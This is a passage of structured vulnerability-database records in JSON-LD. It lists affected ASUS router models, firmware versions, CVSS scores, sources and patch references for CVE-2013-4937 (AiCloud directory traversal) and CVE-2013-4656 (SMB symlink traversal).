"trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201401-417" } ], "trust": 0.6 } }
var-201307-0434
Vulnerability from variot
Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors. ASUS RT-N66U is a wireless router product from ASUS Taiwan. A directory traversal vulnerability exists in ASUS RT-N66U version 3.0.0.4.270 and 3.0.0.4.354. Remote vulnerabilities can be used by remote attackers to obtain sensitive information, and the acquisition of this information can help launch further attacks. Other attacks may also be possible. The following versions are affected: ASUS RT-AC66U with firmware 3.0.0.4.354 and earlier, RT-N66U 3.0.0.4.370 and earlier, RT-N65U 3.0.0.4.346 and earlier, RT-N14U 3.0.0.4.356 and earlier, RT-N16 3.0.0.4.354 and earlier, RT-N56U 3.0.0.4.360 and earlier and 3.0.0.4.364 and earlier, DSL -N55U
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201307-0434", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.260" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.220" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "7.0.2.38b" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "1.0.1.9" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.3.108" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.3.178" }, { "model": "dsl-n56u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "1.0.0.9" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.3.162" }, { "model": "rt-n16", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.246" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.8j" }, { "model": "dsl-n56u", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.364" }, { "model": "dsl-n55u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.246" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.3.176" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.334" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.342" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.260" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "8.1.1.4" }, { "model": "rt-n16", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.354" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "7.0.1.32" }, { "model": "rt-n66u", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.370" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.8n" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.4" }, { "model": "rt-n56u", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.360" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.8l" }, { "model": "rt-ac66u", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.354" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.4o" }, { "model": "rt-n14u", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.356" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.260" }, { "model": "rt-n14u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.2.3" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.318" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.140" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.7c" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.220" }, { "model": "rt-n14u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.322" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "dsl-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.314" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "7.0.1.21" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.270" }, { "model": "rt-n65u", "scope": "lte", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.346" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.334" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.342" }, { "model": "rt-n66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.272" }, { "model": "dsl-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.188" }, { "model": "rt-n65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.3.134" }, { "model": "rt-n66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "1.0.1.7f" }, { "model": "dsl-n55u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "dsl-n56u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.4.372" }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac66u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.4.372" }, { "model": "rt-n14u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n14u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.4.372" }, { "model": "rt-n16", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n16", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.4.372" }, { "model": "rt-n56u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n56u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.4.372" }, { "model": "rt-n65u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n65u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.4.372" }, { "model": "rt-n66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n66u", "scope": "lt", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.4.372" }, { "model": "rt-n66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-n14u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.356" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "db": "CNNVD", "id": "CNNVD-201307-570" }, { "db": "NVD", "id": "CVE-2013-4937" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/h:asus:dsl-n55u", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:dsl-n56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:asus:rt-ac66u", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:asus:rt-n14u", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n14u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:asus:rt-n16", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n16_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:asus:rt-n56u", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:asus:rt-n65u", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n65u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/h:asus:rt-n66u", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n66u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003514" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Kyle Lovett", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-145" } ], "trust": 0.6 }, "cve": "CVE-2013-4937", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2013-4937", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2013-08385", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-64939", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-4937", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2013-4937", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2013-08385", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201307-570", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-64939", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "VULHUB", "id": "VHN-64939" }, { "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "db": "CNNVD", "id": "CNNVD-201307-570" }, { "db": "NVD", "id": "CVE-2013-4937" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple unspecified vulnerabilities in the AiCloud feature on the ASUS RT-AC66U, RT-N66U, RT-N65U, RT-N14U, RT-N16, RT-N56U, and DSL-N55U with firmware before 3.0.4.372 have unknown impact and attack vectors. ASUS RT-N66U is a wireless router product from ASUS Taiwan. \nA directory traversal vulnerability exists in ASUS RT-N66U version 3.0.0.4.270 and 3.0.0.4.354. Remote vulnerabilities can be used by remote attackers to obtain sensitive information, and the acquisition of this information can help launch further attacks. Other attacks may also be possible. The following versions are affected: ASUS RT-AC66U with firmware 3.0.0.4.354 and earlier, RT-N66U 3.0.0.4.370 and earlier, RT-N65U 3.0.0.4.346 and earlier, RT-N14U 3.0.0.4.356 and earlier, RT-N16 3.0.0.4.354 and earlier, RT-N56U 3.0.0.4.360 and earlier and 3.0.0.4.364 and earlier, DSL -N55U", "sources": [ { "db": "NVD", "id": "CVE-2013-4937" }, { "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "CNNVD", "id": "CNNVD-201307-145" }, { "db": "BID", "id": "60780" }, { "db": "VULHUB", "id": "VHN-64939" } ], "trust": 3.06 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-4937", "trust": 2.8 }, { "db": "BID", "id": "60780", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2013-003514", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201307-570", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2013-08385", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201307-145", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-64939", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "VULHUB", "id": "VHN-64939" }, { "db": "BID", "id": "60780" }, { "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "db": "CNNVD", "id": "CNNVD-201307-145" }, { "db": "CNNVD", "id": "CNNVD-201307-570" }, { "db": "NVD", "id": "CVE-2013-4937" } ] }, "id": "VAR-201307-0434", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "VULHUB", "id": "VHN-64939" } ], "trust": 1.291374855714286 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-08385" } ] }, "last_update_date": "2024-11-23T22:23:13.851000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Firmware update 3.0.4.372 for ASUS routers with AiCloud fixes found vulnerabilities", "trust": 0.8, "url": "http://twitter.com/ASUSUSA/statuses/357612236392509440" }, { "title": "Networking", "trust": 0.8, "url": "http://www.asus.com/Networking/Wireless_Routers_Products/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003514" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-4937" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://twitter.com/asususa/statuses/357612236392509440" }, { "trust": 1.7, "url": "http://reviews.cnet.com/8301-3132_7-57594003-98" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/60780" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4937" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-4937" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "VULHUB", "id": "VHN-64939" }, { "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "db": "CNNVD", "id": "CNNVD-201307-145" }, { "db": "CNNVD", "id": "CNNVD-201307-570" }, { "db": "NVD", "id": "CVE-2013-4937" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "VULHUB", "id": "VHN-64939" }, { "db": "BID", "id": "60780" }, { "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "db": "CNNVD", "id": "CNNVD-201307-145" }, { "db": "CNNVD", "id": "CNNVD-201307-570" }, { "db": "NVD", "id": "CVE-2013-4937" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-28T00:00:00", "db": "CNVD", "id": "CNVD-2013-08385" }, { "date": "2013-07-26T00:00:00", "db": "VULHUB", "id": "VHN-64939" }, { "date": "2013-06-24T00:00:00", "db": "BID", "id": "60780" }, { "date": "2013-07-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "date": "2013-06-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-145" }, { "date": "2013-07-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-570" }, { "date": "2013-07-26T12:05:40.867000", "db": "NVD", "id": "CVE-2013-4937" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-28T00:00:00", "db": "CNVD", "id": "CNVD-2013-08385" }, { "date": "2013-07-26T00:00:00", "db": "VULHUB", "id": "VHN-64939" }, { "date": "2013-07-29T13:14:00", "db": "BID", "id": "60780" }, { "date": "2013-07-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003514" }, { "date": "2013-07-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-145" }, { "date": "2013-08-05T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-570" }, { "date": "2024-11-21T01:56:43.360000", "db": "NVD", "id": "CVE-2013-4937" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-145" }, { "db": "CNNVD", "id": "CNNVD-201307-570" } ], "trust": 1.2 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-N66U Directory Traversal Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2013-08385" }, { "db": "CNNVD", "id": "CNNVD-201307-145" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "path traversal", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-145" } ], "trust": 0.6 } }
var-201911-1519
Vulnerability from variot
Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service. ASUS RT-AC66U and RT-N56U Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1519", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac66u", "scope": "eq", "trust": 2.2, "vendor": "asus", "version": null }, { "model": "rt-n56u", "scope": "eq", "trust": 2.2, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "db": "CNNVD", "id": "CNNVD-201911-727" }, { "db": "NVD", "id": "CVE-2013-4656" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" } ] }, "cve": "CVE-2013-4656", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2013-4656", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2013-4656", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2013-4656", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-4656", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2013-4656", "trust": 0.8, "value": "Critical" }, { "author": "CNNVD", "id": "CNNVD-201911-727", "trust": 0.6, "value": "CRITICAL" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "db": "CNNVD", "id": "CNNVD-201911-727" }, { "db": "NVD", "id": "CVE-2013-4656" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service. ASUS RT-AC66U and RT-N56U Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state", "sources": [ { "db": "NVD", "id": "CVE-2013-4656" }, { "db": "JVNDB", "id": "JVNDB-2013-006951" } ], "trust": 1.62 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-4656", "trust": 2.4 }, { "db": "JVNDB", "id": "JVNDB-2013-006951", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201911-727", "trust": 0.6 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006951" }, { "db": "CNNVD", "id": "CNNVD-201911-727" }, { "db": "NVD", "id": "CVE-2013-4656" } ] }, "id": "VAR-201911-1519", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.539042785 }, "last_update_date": "2024-11-23T23:01:34.738000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": 